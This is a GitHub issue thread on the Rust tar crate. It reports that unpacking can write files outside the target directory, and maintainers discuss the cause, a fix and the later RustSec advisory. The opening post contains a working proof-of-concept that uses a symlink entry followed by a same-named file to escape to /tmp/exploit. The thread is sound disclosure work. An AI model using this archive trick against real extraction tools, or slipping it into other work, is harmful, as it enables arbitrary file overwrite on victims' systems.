### ISSUE TITLE
unpack_in still allows creating files outside the directory

### ISSUE THREAD

**Issue by taralx** [alexcrichton/tar-rs#129]
The following tar construct will write to /tmp/exploit:

```rust
extern crate tar;
use std::io;
use tar::{Archive,Builder,Header,EntryType};

fn main() {
    let mut buf = Vec::new();
    {
        let mut builder = Builder::new(&mut buf);

        let mut header = Header::new_gnu();
        header.set_path("symlink").unwrap();
        header.set_link_name("/tmp/exploit").unwrap();
        header.set_entry_type(EntryType::symlink());
        header.set_size(0);
        header.set_cksum();
        builder.append(&header, io::empty()).unwrap();

        let mut header = Header::new_gnu();
        header.set_path("symlink").unwrap();
        header.set_size(0);
        header.set_cksum();
        builder.append(&header, io::empty()).unwrap();

        builder.finish().unwrap();
    }

    Archive::new(&*buf).unpack(".").unwrap();
}
```

**Comment by alexcrichton** [comment]
cc @lucab this was originally rejected by https://github.com/alexcrichton/tar-rs/commit/85b6399b212f66eb955431f214e0e9eb408988c8 but I think https://github.com/alexcrichton/tar-rs/pull/90 may have started allowing this? Mind helping to take a look?

**Comment by lucab** [comment]
Right, I think this is my fault as I didn't take into account such case, and the absolute link test is also blind to this. The problem is that we rely on checking parents for path escaping, because `std::fs::canonicalize` only works on **already existing** paths. It is not enough in this case.

I have an initial fix in this local branch https://github.com/alexcrichton/tar-rs/compare/master...lucab:ups/chase_link?expand=1. However I fear it could be still missing some corner cases (and I'm currently traveling). Should I submit anyway a PR with the above?

**Comment by alexcrichton** [comment]
@lucab yeah I'm ok sort of patching up behavior here over time, a PR would be most welcome!

**Comment by taralx** [comment]
I'm not sure I have time to make a PR, but I certainly recommend that unpack should not write to symlinks unless the user says that they expect that behavior. It's almost never what you want.

(Arguments can be made for just not following symlinks at all.)

**Comment by mbrubeck** [comment]
The exploit given above no longer works on master.  `git bisect` shows it was fixed by #229.

**Comment by mbrubeck** [comment]
A security advisory was published at the time:

https://github.com/RustSec/advisory-db/blob/master/crates/tar/RUSTSEC-2018-0002.toml
